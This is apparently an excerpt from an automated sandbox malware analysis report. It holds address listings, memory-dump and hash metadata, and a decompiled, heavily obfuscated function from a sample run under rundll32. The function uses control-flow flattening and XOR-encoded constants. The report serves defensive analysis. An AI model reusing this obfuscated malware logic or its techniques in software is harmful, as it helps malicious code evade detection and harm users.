                                                                                                                      0x00683668
                                                                                                                      0x0068366c
                                                                                                                      0x00683674
                                                                                                                      0x0068367c
                                                                                                                      0x00683687
                                                                                                                      0x00683692
                                                                                                                      0x0068369d
                                                                                                                      0x006836b0
                                                                                                                      0x006836b7
                                                                                                                      0x006836c2
                                                                                                                      0x006836cd
                                                                                                                      0x006836d8
                                                                                                                      0x006836e3
                                                                                                                      0x006836ee
                                                                                                                      0x006836f9
                                                                                                                      0x00683701
                                                                                                                      0x0068370c
                                                                                                                      0x00683714
                                                                                                                      0x00683722
                                                                                                                      0x00683726
                                                                                                                      0x0068372e
                                                                                                                      0x00683736
                                                                                                                      0x00683741
                                                                                                                      0x0068374c
                                                                                                                      0x00683757
                                                                                                                      0x00683757
                                                                                                                      0x00683757
                                                                                                                      0x0068375c
                                                                                                                      0x00683761
                                                                                                                      0x00683766
                                                                                                                      0x00683766
                                                                                                                      0x00683766
                                                                                                                      0x00683766
                                                                                                                      0x00683768
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068376e
                                                                                                                      0x0068392a
                                                                                                                      0x00683936
                                                                                                                      0x00683941
                                                                                                                      0x00683946
                                                                                                                      0x0068394f
                                                                                                                      0x00683951
                                                                                                                      0x0068395c
                                                                                                                      0x00683973
                                                                                                                      0x0068398c
                                                                                                                      0x00683998
                                                                                                                      0x006839b5
                                                                                                                      0x006839c3
                                                                                                                      0x006839d1
                                                                                                                      0x006839e0
                                                                                                                      0x006839fd
                                                                                                                      0x00683a1c
                                                                                                                      0x00683a23
                                                                                                                      0x00683a2f
                                                                                                                      0x00683a43
                                                                                                                      0x00683a46
                                                                                                                      0x00683a58
                                                                                                                      0x00683a5f
                                                                                                                      0x00000000
                                                                                                                      0x00683774
                                                                                                                      0x0068377a
                                                                                                                      0x00683907
                                                                                                                      0x0068391d
                                                                                                                      0x00683923
                                                                                                                      0x00683757
                                                                                                                      0x00683757
                                                                                                                      0x00683757
                                                                                                                      0x0068375c
                                                                                                                      0x00683761
                                                                                                                      0x00000000
                                                                                                                      0x00683761
                                                                                                                      0x00683780
                                                                                                                      0x00683786
                                                                                                                      0x006838fd
                                                                                                                      0x00000000
                                                                                                                      0x0068378c
                                                                                                                      0x0068378e
                                                                                                                      0x00683829
                                                                                                                      0x00683835
                                                                                                                      0x00683845
                                                                                                                      0x00683847
                                                                                                                      0x0068384b
                                                                                                                      0x0068385a
                                                                                                                      0x00683868
                                                                                                                      0x00683869
                                                                                                                      0x00683870
                                                                                                                      0x006838a5
                                                                                                                      0x006838bb
                                                                                                                      0x006838cb
                                                                                                                      0x006838d0
                                                                                                                      0x006838d3
                                                                                                                      0x006838d7
                                                                                                                      0x006838e0
                                                                                                                      0x006838d9
                                                                                                                      0x006838db
                                                                                                                      0x006838dd
                                                                                                                      0x006838dd
                                                                                                                      0x006838f2
                                                                                                                      0x00000000
                                                                                                                      0x00683794
                                                                                                                      0x00683794
                                                                                                                      0x00683796
                                                                                                                      0x0068379c
                                                                                                                      0x006837a8
                                                                                                                      0x006837b3
                                                                                                                      0x006837b9
                                                                                                                      0x006837e4
                                                                                                                      0x006837fe
                                                                                                                      0x0068381c
                                                                                                                      0x0068381f
                                                                                                                      0x00683b98
                                                                                                                      0x00683b98
                                                                                                                      0x00683b9b
                                                                                                                      0x00683b9b
                                                                                                                      0x00683ba0
                                                                                                                      0x00683ba5
                                                                                                                      0x00683baa
                                                                                                                      0x00683baa
                                                                                                                      0x00683796
                                                                                                                      0x00000000
                                                                                                                      0x0068378e
                                                                                                                      0x00683786
                                                                                                                      0x0068377a
                                                                                                                      0x00683aa7
                                                                                                                      0x00683ab1
                                                                                                                      0x00683ab1
                                                                                                                      0x00683a69
                                                                                                                      0x00683a6f
                                                                                                                      0x00683aef
                                                                                                                      0x00683afb
                                                                                                                      0x00683b03
                                                                                                                      0x00683b08
                                                                                                                      0x00683b16
                                                                                                                      0x00683b24
                                                                                                                      0x00683b3e
                                                                                                                      0x00683b68
                                                                                                                      0x00683b76
                                                                                                                      0x00683b79
                                                                                                                      0x00683b8e
                                                                                                                      0x00683b93
                                                                                                                      0x00000000
                                                                                                                      0x00683a71
                                                                                                                      0x00683a71
                                                                                                                      0x00683a73
                                                                                                                      0x00683ac7
                                                                                                                      0x00683acd
                                                                                                                      0x00683ace
                                                                                                                      0x00683ad9
                                                                                                                      0x00683add
                                                                                                                      0x00683ae2
                                                                                                                      0x00683ae4
                                                                                                                      0x00683ae7
                                                                                                                      0x00000000
                                                                                                                      0x00683a75
                                                                                                                      0x00683a75
                                                                                                                      0x00683a77
                                                                                                                      0x00000000
                                                                                                                      0x00683a7d
                                                                                                                      0x00683a7d
                                                                                                                      0x00683a9d
                                                                                                                      0x00683aa2
                                                                                                                      0x00683a77
                                                                                                                      0x00683a73
                                                                                                                      0x00000000
                                                                                                                      0x00683baf
                                                                                                                      0x00683baf
                                                                                                                      0x00000000
                                                                                                                      0x00683bbb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$ $(|?|$;]z$='mm$?$I*5$J&9$J&9$LCl$c@9$lT&$t1 $Y($>
                                                                                                                      • API String ID: 0-1427316221
                                                                                                                      • Opcode ID: a2412b40e0c09a574c3d1c475fd922a74219b43ef7cb11ded0b910deee92b11a
                                                                                                                      • Instruction ID: 7a9e4708305e8260f56442ba528f44890a61e0d6c20145b39314b010f4316b03
                                                                                                                      • Opcode Fuzzy Hash: a2412b40e0c09a574c3d1c475fd922a74219b43ef7cb11ded0b910deee92b11a
                                                                                                                      • Instruction Fuzzy Hash: 4472E1715093818FD3B8DF25C58AB8BBBE2FBC5304F10891DE5DA96260DBB58949CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069AE6D Relevance: 19.3, Strings: 15, Instructions: 522COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0069AE6D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				void* _t537;
				void* _t566;
				void* _t567;
				intOrPtr _t573;
				void* _t575;
				void* _t577;
				void* _t585;
				void* _t588;
				void* _t594;
				void* _t596;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t608;
				signed int _t609;
				signed int _t610;
				void* _t611;
				void* _t633;
				void* _t660;
				void* _t675;
				intOrPtr _t677;
				intOrPtr _t680;
				signed int* _t682;
				void* _t685;

				_push(_a20);
				_t677 = __edx;
				_push(_a16);
				_v24 = __edx;
				_push(0x20);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t537);
				_v8 = 0x673696;
				_t680 = 0;
				_v4 = 0;
				_t682 =  &(( &_v272)[7]);
				_v144 = 0xf00d33;
				_v144 = _v144 | 0x228e8b2e;
				_t596 = 0x1d3710;
				_v144 = _v144 >> 8;
				_v144 = _v144 ^ 0x0022fe8f;
				_v244 = 0xde08aa;
				_t603 = 0x17;
				_v244 = _v244 / _t603;
				_v244 = _v244 + 0xffff54ea;
				_v244 = _v244 << 0xa;
				_v244 = _v244 ^ 0x23f0fc00;
				_v224 = 0x36cb35;
				_v224 = _v224 | 0xc39aec51;
				_v224 = _v224 + 0x9146;
				_t604 = 0x62;
				_v224 = _v224 * 0x70;
				_v224 = _v224 ^ 0xa3c851d0;
				_v116 = 0xf2e64b;
				_v116 = _v116 << 5;
				_v116 = _v116 ^ 0x1e5cc960;
				_v248 = 0x2b7d5f;
				_t43 =  &_v248; // 0x2b7d5f
				_v248 =  *_t43 * 0x53;
				_v248 = _v248 + 0x8561;
				_v248 = _v248 | 0xae4dc352;
				_v248 = _v248 ^ 0xae5feb7e;
				_v80 = 0xe6036b;
				_v80 = _v80 * 0xb;
				_v80 = _v80 ^ 0x09e22599;
				_v240 = 0x5b8b4f;
				_v240 = _v240 + 0xffffe1e0;
				_v240 = _v240 ^ 0xb7b7812a;
				_v240 = _v240 + 0xffff41e0;
				_v240 = _v240 ^ 0xb7ec2de5;
				_v232 = 0xf81ab6;
				_v232 = _v232 ^ 0xa56b9217;
				_v232 = _v232 | 0x431a55e8;
				_v232 = _v232 << 7;
				_v232 = _v232 ^ 0xcdeef480;
				_v184 = 0xddfe73;
				_v184 = _v184 * 0x26;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xf3c51200;
				_v120 = 0x644fb5;
				_v120 = _v120 >> 6;
				_v120 = _v120 / _t604;
				_v120 = _v120 ^ 0x00000418;
				_v60 = 0xc6ff9f;
				_v60 = _v60 ^ 0x0d96ce7d;
				_v60 = _v60 ^ 0x0d5031e2;
				_v204 = 0xeedb74;
				_v204 = _v204 >> 0xb;
				_v204 = _v204 >> 0xa;
				_v204 = _v204 | 0xba569879;
				_v204 = _v204 ^ 0xba56987f;
				_v268 = 0x9a0618;
				_v268 = _v268 ^ 0x10270239;
				_v268 = _v268 ^ 0x733075d3;
				_t605 = 0x16;
				_v268 = _v268 / _t605;
				_v268 = _v268 ^ 0x04865c22;
				_v160 = 0x655fad;
				_v160 = _v160 >> 3;
				_v160 = _v160 >> 4;
				_v160 = _v160 ^ 0x0009a8dc;
				_v272 = 0x9202;
				_v272 = _v272 | 0xfb135803;
				_t606 = 0x41;
				_v272 = _v272 * 0x2c;
				_v272 = _v272 << 1;
				_v272 = _v272 ^ 0x4ed07035;
				_v100 = 0x536289;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xa6cd28cf;
				_v108 = 0xf021d8;
				_v108 = _v108 ^ 0x8f8b6ed2;
				_v108 = _v108 ^ 0x8f701d8c;
				_v152 = 0xcba027;
				_v152 = _v152 ^ 0xce0cd109;
				_v152 = _v152 | 0x7dfb06f6;
				_v152 = _v152 ^ 0xfff88f5e;
				_v252 = 0xf09c41;
				_v252 = _v252 + 0x8e2a;
				_v252 = _v252 << 3;
				_v252 = _v252 | 0xdb831f2c;
				_v252 = _v252 ^ 0xdf846234;
				_v260 = 0x3d692f;
				_v260 = _v260 << 2;
				_v260 = _v260 | 0xbfb4a027;
				_v260 = _v260 + 0x643;
				_v260 = _v260 ^ 0xbffb0fde;
				_v92 = 0x80bca7;
				_v92 = _v92 >> 0xa;
				_v92 = _v92 ^ 0x00038c1c;
				_v228 = 0xbbbc43;
				_v228 = _v228 | 0x61282476;
				_v228 = _v228 + 0xffff6ee2;
				_v228 = _v228 * 0x69;
				_v228 = _v228 ^ 0x15ccd750;
				_v236 = 0xc2062f;
				_v236 = _v236 | 0xf7f3ef67;
				_v236 = _v236 * 0x5c;
				_v236 = _v236 ^ 0x1ba01eed;
				_v128 = 0xa773bc;
				_v128 = _v128 << 0x10;
				_v128 = _v128 | 0xe162daa5;
				_v128 = _v128 ^ 0xf3f36b57;
				_v136 = 0x3287f3;
				_v136 = _v136 / _t606;
				_v136 = _v136 >> 9;
				_v136 = _v136 ^ 0x000c37d1;
				_v104 = 0x8d5fef;
				_v104 = _v104 + 0xffff56ea;
				_v104 = _v104 ^ 0x008f942b;
				_v44 = 0xd6bac6;
				_v44 = _v44 * 0x7f;
				_v44 = _v44 ^ 0x6a80c639;
				_v148 = 0xa4165e;
				_v148 = _v148 * 0x13;
				_v148 = _v148 | 0x84e82f79;
				_v148 = _v148 ^ 0x8cef9599;
				_v96 = 0xfc4916;
				_v96 = _v96 + 0xffff0795;
				_v96 = _v96 ^ 0x00f5cebb;
				_v132 = 0xd5d7c2;
				_v132 = _v132 >> 0x10;
				_v132 = _v132 << 0xd;
				_v132 = _v132 ^ 0x0010cc3c;
				_v264 = 0xf6e8cb;
				_v264 = _v264 + 0x6576;
				_v264 = _v264 + 0x7b15;
				_v264 = _v264 + 0x6b9c;
				_v264 = _v264 ^ 0x00fe3ec7;
				_v208 = 0x3a8541;
				_v208 = _v208 | 0x57459f57;
				_v208 = _v208 ^ 0x66631a8c;
				_v208 = _v208 | 0x178bfabb;
				_v208 = _v208 ^ 0x379a2cb6;
				_v56 = 0x33c5e6;
				_v56 = _v56 + 0x441;
				_v56 = _v56 ^ 0x0035e6a0;
				_v172 = 0x2bd4df;
				_v172 = _v172 + 0xda1f;
				_v172 = _v172 + 0x8171;
				_v172 = _v172 ^ 0x002cd084;
				_v48 = 0x796d26;
				_v48 = _v48 + 0xffff3152;
				_v48 = _v48 ^ 0x00766b67;
				_v88 = 0xfc738c;
				_v88 = _v88 << 0xe;
				_v88 = _v88 ^ 0x1ce8da45;
				_v140 = 0x79fdd0;
				_v140 = _v140 >> 0xe;
				_v140 = _v140 * 0x78;
				_v140 = _v140 ^ 0x000f2c53;
				_v64 = 0xd0b1f6;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x000411a2;
				_v200 = 0xaa2240;
				_v200 = _v200 | 0x35f3f2d4;
				_v200 = _v200 + 0x4147;
				_v200 = _v200 + 0xffff1702;
				_v200 = _v200 ^ 0x35f16a60;
				_v52 = 0x980f89;
				_v52 = _v52 ^ 0xc15a5b47;
				_v52 = _v52 ^ 0xc1c323e9;
				_v216 = 0xb7a8b5;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0xa2f7ad91;
				_v216 = _v216 + 0xfffff0a8;
				_v216 = _v216 ^ 0xa2ec62b8;
				_v72 = 0x73581d;
				_v72 = _v72 + 0xffffc838;
				_v72 = _v72 ^ 0x00777119;
				_v164 = 0x873053;
				_v164 = _v164 ^ 0xefe323e3;
				_v164 = _v164 | 0xd91bba05;
				_v164 = _v164 ^ 0xff705bac;
				_v40 = 0xf8d5df;
				_v40 = _v40 ^ 0x79f853d7;
				_v40 = _v40 ^ 0x79053437;
				_v192 = 0x180af0;
				_v192 = _v192 + 0xffff4c14;
				_v192 = _v192 << 8;
				_v192 = _v192 + 0x2aad;
				_v192 = _v192 ^ 0x175759c3;
				_v256 = 0x23b549;
				_v256 = _v256 + 0x5eb6;
				_v256 = _v256 | 0xffb7bbff;
				_v256 = _v256 ^ 0xffb807e9;
				_v176 = 0xc1fdd5;
				_v176 = _v176 >> 0xc;
				_v176 = _v176 | 0x5151af8d;
				_v176 = _v176 ^ 0x515c7a4b;
				_v112 = 0xec5780;
				_v112 = _v112 ^ 0x97b4c021;
				_v112 = _v112 ^ 0x9750bd7e;
				_v180 = 0x591b41;
				_v180 = _v180 + 0x207e;
				_v180 = _v180 + 0xffffc81d;
				_v180 = _v180 ^ 0x005ca8dc;
				_v68 = 0x76fd1d;
				_t675 = 0x5c52c4a;
				_v68 = _v68 | 0x9e2d4356;
				_v68 = _v68 ^ 0x9e728261;
				_v76 = 0xf22a3;
				_v76 = _v76 | 0x9c703035;
				_v76 = _v76 ^ 0x9c7b5f20;
				_v220 = 0x3decab;
				_v220 = _v220 << 8;
				_v220 = _v220 ^ 0x53082a5e;
				_v220 = _v220 >> 0xd;
				_v220 = _v220 ^ 0x0004d715;
				_v84 = 0x6eb476;
				_v84 = _v84 << 0xd;
				_v84 = _v84 ^ 0xd68135de;
				_v124 = 0x458e11;
				_v124 = _v124 | 0x336f5b57;
				_t607 = 0x43;
				_v124 = _v124 / _t607;
				_v124 = _v124 ^ 0x00c97d17;
				_v156 = 0x7cba2c;
				_t608 = 0x4b;
				_v156 = _v156 / _t608;
				_v156 = _v156 | 0x0b494d21;
				_v156 = _v156 ^ 0x0b48f5d9;
				_v36 = 0x519404;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0x5195ba3f;
				_v168 = 0xf13e55;
				_v168 = _v168 | 0x95edbe5f;
				_v168 = _v168 ^ 0xd6548190;
				_v168 = _v168 ^ 0x43a3dbfd;
				_v188 = 0xdd4a71;
				_v188 = _v188 + 0xffff5bb0;
				_v188 = _v188 >> 0xb;
				_v188 = _v188 >> 6;
				_v188 = _v188 ^ 0x000a03ec;
				_v196 = 0x58b29f;
				_t609 = 0x22;
				_v196 = _v196 / _t609;
				_v196 = _v196 + 0xffff713e;
				_v196 = _v196 + 0xffff146a;
				_v196 = _v196 ^ 0x000c9f67;
				_v212 = 0xc056c;
				_t610 = 0x45;
				_v212 = _v212 * 0x51;
				_v212 = _v212 >> 0xc;
				_v212 = _v212 / _t610;
				_v212 = _v212 ^ 0x0007774b;
				while(1) {
					L1:
					_t566 = 0x6c6f684;
					while(1) {
						L2:
						_t611 = 0x92c3a26;
						while(1) {
							L3:
							do {
								while(1) {
									L4:
									_t685 = _t596 - _t675;
									if(_t685 > 0) {
										break;
									}
									if(_t685 == 0) {
										E00696BC6(_v124, _v32, _v156);
										_t596 = 0x4bc1ff4;
										goto L1;
									} else {
										if(_t596 == 0x1d3710) {
											_t596 = 0x6d0da1a;
											continue;
										} else {
											if(_t596 == 0x19992af) {
												_push(_t611);
												_push(_t611);
												_t573 = E00687FF2(_v16);
												__eflags = _t573;
												_v20 = _t573;
												_t660 = 0x19c2787;
												_t596 =  !=  ? 0x19c2787 : 0x87f6c1b;
												_t566 = 0x6c6f684;
												_t611 = 0x92c3a26;
												continue;
											} else {
												if(_t596 == _t660) {
													_t575 = E00697B05(_v16,  &_v32, _v28, _v216, _v72, _v164, _v248, _v40, _v80, _t611, _v192, _v256, _v20);
													_t682 =  &(_t682[0xc]);
													__eflags = _t575 - _v240;
													_t611 = 0x92c3a26;
													_t566 = 0x6c6f684;
													_t596 =  ==  ? 0x92c3a26 : 0x4bc1ff4;
													goto L3;
												} else {
													if(_t596 == 0x489cb15) {
														_push(_v148);
														_push(_v44);
														_t577 = E0069DCF7(_v104, 0x6818b4, __eflags);
														_pop(_t633);
														__eflags = E006A0B68(_t577,  &_v12, _v224, _v96, _t633,  &_v16, _v132, _v264, _v208, _v56, _v28, _v172) - _v116;
														_t596 =  ==  ? 0x19992af : 0x87f6c1b;
														E0068A8B0(_v48, _t577, _v88);
														_t677 = _v24;
														_t682 =  &(_t682[0xb]);
														L24:
														_t566 = 0x6c6f684;
														_t611 = 0x92c3a26;
														_t660 = 0x19c2787;
														goto L25;
													} else {
														if(_t596 != 0x4bc1ff4) {
															goto L25;
														} else {
															E00698519(_v36, _v168, _v20);
															_t596 = 0x87f6c1b;
															while(1) {
																L1:
																_t566 = 0x6c6f684;
																L2:
																_t611 = 0x92c3a26;
																L3:
																goto L4;
															}
														}
													}
												}
											}
										}
									}
									L28:
									return _t680;
								}
								__eflags = _t596 - _t566;
								if(_t596 == _t566) {
									_t567 = E0069828A(_v68, _v76, _v220, _t677, _v120, 0x20, _v84, _v32);
									_t682 =  &(_t682[6]);
									_t596 = _t675;
									__eflags = _t567 - _v60;
									_t680 =  ==  ? 1 : _t680;
									goto L24;
								} else {
									__eflags = _t596 - 0x6d0da1a;
									if(__eflags == 0) {
										_push(_v272);
										_push(_v160);
										_t585 = E0069DCF7(_v268, 0x681884, __eflags);
										_push(_v152);
										_push(_v108);
										_t588 = E00689462(_t585, _v260,  &_v28, E0069DCF7(_v100, 0x681814, __eflags), _v92, _v144);
										_t682 =  &(_t682[9]);
										__eflags = _t588 - _v244;
										_t596 =  ==  ? 0x489cb15 : 0x822e036;
										E0068A8B0(_v228, _t585, _v236);
										E0068A8B0(_v128, _t586, _v136);
										_t677 = _v24;
										_t675 = 0x5c52c4a;
										goto L24;
									} else {
										__eflags = _t596 - 0x87f6c1b;
										if(_t596 == 0x87f6c1b) {
											E0068957D(_v28, _v188, _v196, _v204, _v212);
										} else {
											__eflags = _t596 - _t611;
											if(_t596 != _t611) {
												goto L25;
											} else {
												_t594 = E0068A81D(_v32, _a4, _v176, _v112, _v232, _a20, _v180);
												_t682 =  &(_t682[5]);
												__eflags = _t594 - _v184;
												_t566 = 0x6c6f684;
												_t596 =  ==  ? 0x6c6f684 : _t675;
												goto L2;
											}
										}
									}
								}
								goto L28;
								L25:
								__eflags = _t596 - 0x822e036;
							} while (__eflags != 0);
							goto L28;
						}
					}
				}
			}

































































































                                                                                                                      0x0069ae77
                                                                                                                      0x0069ae7e
                                                                                                                      0x0069ae80
                                                                                                                      0x0069ae87
                                                                                                                      0x0069ae8e
                                                                                                                      0x0069ae90
                                                                                                                      0x0069ae97
                                                                                                                      0x0069ae9e
                                                                                                                      0x0069ae9f
                                                                                                                      0x0069aea0
                                                                                                                      0x0069aea5
                                                                                                                      0x0069aeb0
                                                                                                                      0x0069aeb2
                                                                                                                      0x0069aeb9
                                                                                                                      0x0069aebc
                                                                                                                      0x0069aec9
                                                                                                                      0x0069aed4
                                                                                                                      0x0069aed9
                                                                                                                      0x0069aee1
                                                                                                                      0x0069aeec
                                                                                                                      0x0069aefa
                                                                                                                      0x0069aeff
                                                                                                                      0x0069af05
                                                                                                                      0x0069af0d
                                                                                                                      0x0069af12
                                                                                                                      0x0069af1a
                                                                                                                      0x0069af22
                                                                                                                      0x0069af2a
                                                                                                                      0x0069af37
                                                                                                                      0x0069af38
                                                                                                                      0x0069af3c
                                                                                                                      0x0069af44
                                                                                                                      0x0069af4f
                                                                                                                      0x0069af57
                                                                                                                      0x0069af62
                                                                                                                      0x0069af6a
                                                                                                                      0x0069af6f
                                                                                                                      0x0069af73
                                                                                                                      0x0069af7b
                                                                                                                      0x0069af83
                                                                                                                      0x0069af8b
                                                                                                                      0x0069af9e
                                                                                                                      0x0069afa5
                                                                                                                      0x0069afb0
                                                                                                                      0x0069afb8
                                                                                                                      0x0069afc0
                                                                                                                      0x0069afc8
                                                                                                                      0x0069afd0
                                                                                                                      0x0069afd8
                                                                                                                      0x0069afe0
                                                                                                                      0x0069afe8
                                                                                                                      0x0069aff0
                                                                                                                      0x0069aff5
                                                                                                                      0x0069affd
                                                                                                                      0x0069b00a
                                                                                                                      0x0069b00e
                                                                                                                      0x0069b013
                                                                                                                      0x0069b01b
                                                                                                                      0x0069b026
                                                                                                                      0x0069b037
                                                                                                                      0x0069b03e
                                                                                                                      0x0069b049
                                                                                                                      0x0069b054
                                                                                                                      0x0069b05f
                                                                                                                      0x0069b06a
                                                                                                                      0x0069b072
                                                                                                                      0x0069b077
                                                                                                                      0x0069b07e
                                                                                                                      0x0069b086
                                                                                                                      0x0069b08e
                                                                                                                      0x0069b096
                                                                                                                      0x0069b09e
                                                                                                                      0x0069b0ac
                                                                                                                      0x0069b0b1
                                                                                                                      0x0069b0b7
                                                                                                                      0x0069b0bf
                                                                                                                      0x0069b0ca
                                                                                                                      0x0069b0d2
                                                                                                                      0x0069b0da
                                                                                                                      0x0069b0e5
                                                                                                                      0x0069b0ed
                                                                                                                      0x0069b0fa
                                                                                                                      0x0069b0fb
                                                                                                                      0x0069b0ff
                                                                                                                      0x0069b103
                                                                                                                      0x0069b10b
                                                                                                                      0x0069b116
                                                                                                                      0x0069b11e
                                                                                                                      0x0069b129
                                                                                                                      0x0069b134
                                                                                                                      0x0069b13f
                                                                                                                      0x0069b14a
                                                                                                                      0x0069b155
                                                                                                                      0x0069b160
                                                                                                                      0x0069b16b
                                                                                                                      0x0069b176
                                                                                                                      0x0069b17e
                                                                                                                      0x0069b186
                                                                                                                      0x0069b18b
                                                                                                                      0x0069b193
                                                                                                                      0x0069b19b
                                                                                                                      0x0069b1a3
                                                                                                                      0x0069b1a8
                                                                                                                      0x0069b1b0
                                                                                                                      0x0069b1b8
                                                                                                                      0x0069b1c0
                                                                                                                      0x0069b1cb
                                                                                                                      0x0069b1d3
                                                                                                                      0x0069b1de
                                                                                                                      0x0069b1e6
                                                                                                                      0x0069b1ee
                                                                                                                      0x0069b1fb
                                                                                                                      0x0069b1ff
                                                                                                                      0x0069b207
                                                                                                                      0x0069b20f
                                                                                                                      0x0069b21c
                                                                                                                      0x0069b220
                                                                                                                      0x0069b228
                                                                                                                      0x0069b233
                                                                                                                      0x0069b23b
                                                                                                                      0x0069b246
                                                                                                                      0x0069b251
                                                                                                                      0x0069b265
                                                                                                                      0x0069b26c
                                                                                                                      0x0069b274
                                                                                                                      0x0069b27f
                                                                                                                      0x0069b28a
                                                                                                                      0x0069b295
                                                                                                                      0x0069b2a0
                                                                                                                      0x0069b2b3
                                                                                                                      0x0069b2ba
                                                                                                                      0x0069b2c5
                                                                                                                      0x0069b2d8
                                                                                                                      0x0069b2df
                                                                                                                      0x0069b2ea
                                                                                                                      0x0069b2f5
                                                                                                                      0x0069b300
                                                                                                                      0x0069b30b
                                                                                                                      0x0069b316
                                                                                                                      0x0069b321
                                                                                                                      0x0069b329
                                                                                                                      0x0069b331
                                                                                                                      0x0069b33c
                                                                                                                      0x0069b344
                                                                                                                      0x0069b34c
                                                                                                                      0x0069b354
                                                                                                                      0x0069b35c
                                                                                                                      0x0069b364
                                                                                                                      0x0069b36c
                                                                                                                      0x0069b374
                                                                                                                      0x0069b37c
                                                                                                                      0x0069b384
                                                                                                                      0x0069b38c
                                                                                                                      0x0069b397
                                                                                                                      0x0069b3a2
                                                                                                                      0x0069b3ad
                                                                                                                      0x0069b3b5
                                                                                                                      0x0069b3bd
                                                                                                                      0x0069b3c5
                                                                                                                      0x0069b3cd
                                                                                                                      0x0069b3d8
                                                                                                                      0x0069b3e3
                                                                                                                      0x0069b3ee
                                                                                                                      0x0069b3f9
                                                                                                                      0x0069b401
                                                                                                                      0x0069b40c
                                                                                                                      0x0069b417
                                                                                                                      0x0069b427
                                                                                                                      0x0069b42e
                                                                                                                      0x0069b439
                                                                                                                      0x0069b444
                                                                                                                      0x0069b44c
                                                                                                                      0x0069b457
                                                                                                                      0x0069b45f
                                                                                                                      0x0069b467
                                                                                                                      0x0069b46f
                                                                                                                      0x0069b477
                                                                                                                      0x0069b47f
                                                                                                                      0x0069b48a
                                                                                                                      0x0069b495
                                                                                                                      0x0069b4a0
                                                                                                                      0x0069b4a8
                                                                                                                      0x0069b4ad
                                                                                                                      0x0069b4b5
                                                                                                                      0x0069b4bd
                                                                                                                      0x0069b4c5
                                                                                                                      0x0069b4d0
                                                                                                                      0x0069b4db
                                                                                                                      0x0069b4e6
                                                                                                                      0x0069b4ee
                                                                                                                      0x0069b4f6
                                                                                                                      0x0069b4fe
                                                                                                                      0x0069b506
                                                                                                                      0x0069b511
                                                                                                                      0x0069b51c
                                                                                                                      0x0069b527
                                                                                                                      0x0069b52f
                                                                                                                      0x0069b537
                                                                                                                      0x0069b53c
                                                                                                                      0x0069b544
                                                                                                                      0x0069b54c
                                                                                                                      0x0069b554
                                                                                                                      0x0069b55c
                                                                                                                      0x0069b564
                                                                                                                      0x0069b56c
                                                                                                                      0x0069b574
                                                                                                                      0x0069b579
                                                                                                                      0x0069b581
                                                                                                                      0x0069b589
                                                                                                                      0x0069b594
                                                                                                                      0x0069b59f
                                                                                                                      0x0069b5aa
                                                                                                                      0x0069b5b2
                                                                                                                      0x0069b5ba
                                                                                                                      0x0069b5c2
                                                                                                                      0x0069b5cc
                                                                                                                      0x0069b5d7
                                                                                                                      0x0069b5dc
                                                                                                                      0x0069b5e7
                                                                                                                      0x0069b5f2
                                                                                                                      0x0069b5fd
                                                                                                                      0x0069b608
                                                                                                                      0x0069b613
                                                                                                                      0x0069b61b
                                                                                                                      0x0069b620
                                                                                                                      0x0069b628
                                                                                                                      0x0069b62d
                                                                                                                      0x0069b635
                                                                                                                      0x0069b640
                                                                                                                      0x0069b648
                                                                                                                      0x0069b653
                                                                                                                      0x0069b65e
                                                                                                                      0x0069b672
                                                                                                                      0x0069b677
                                                                                                                      0x0069b680
                                                                                                                      0x0069b68b
                                                                                                                      0x0069b69d
                                                                                                                      0x0069b6a2
                                                                                                                      0x0069b6ab
                                                                                                                      0x0069b6b6
                                                                                                                      0x0069b6c1
                                                                                                                      0x0069b6cc
                                                                                                                      0x0069b6d4
                                                                                                                      0x0069b6df
                                                                                                                      0x0069b6e7
                                                                                                                      0x0069b6ef
                                                                                                                      0x0069b6f7
                                                                                                                      0x0069b6ff
                                                                                                                      0x0069b707
                                                                                                                      0x0069b70f
                                                                                                                      0x0069b714
                                                                                                                      0x0069b719
                                                                                                                      0x0069b721
                                                                                                                      0x0069b72d
                                                                                                                      0x0069b732
